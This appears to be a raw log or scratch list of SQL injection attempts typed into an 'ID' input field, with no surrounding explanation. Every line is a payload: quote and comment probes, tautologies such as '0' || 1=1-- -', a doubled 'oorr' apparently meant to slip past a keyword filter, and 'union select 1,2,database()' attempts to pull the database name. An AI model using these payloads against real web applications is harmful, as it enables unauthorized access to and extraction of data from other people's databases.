ID:1
ID:1-- -
ID:1'
ID:1
ID:1-- -
ID:1-- 
ID:0' oorr 1=1-- -
ID:0' oorr 1=1-- -
ID:1'
ID:0' oorr 1=1-- -
ID:0 || 1=1-- -
ID:0' || 1=1-- -
ID:1' 
ID:-1′ union select 1,2,database() && 1=1 – 
ID:-1′ union select 1,2,database() && 1=1 – 
ID:-1′ union select 1,2,database()-- -
ID:-1′ union select 1,2,database() && 1=1 – -- -
ID:-1′ union select 1,2,database() && 1=1 – 
ID:-1′ union select 1,2,database() && 1=1 – 
ID:-1′ union select 1,2,database() && 1=1 – 
ID:0 && 1=1-- -
ID:0 || 1=1-- -
ID:0 || 1=1-- -
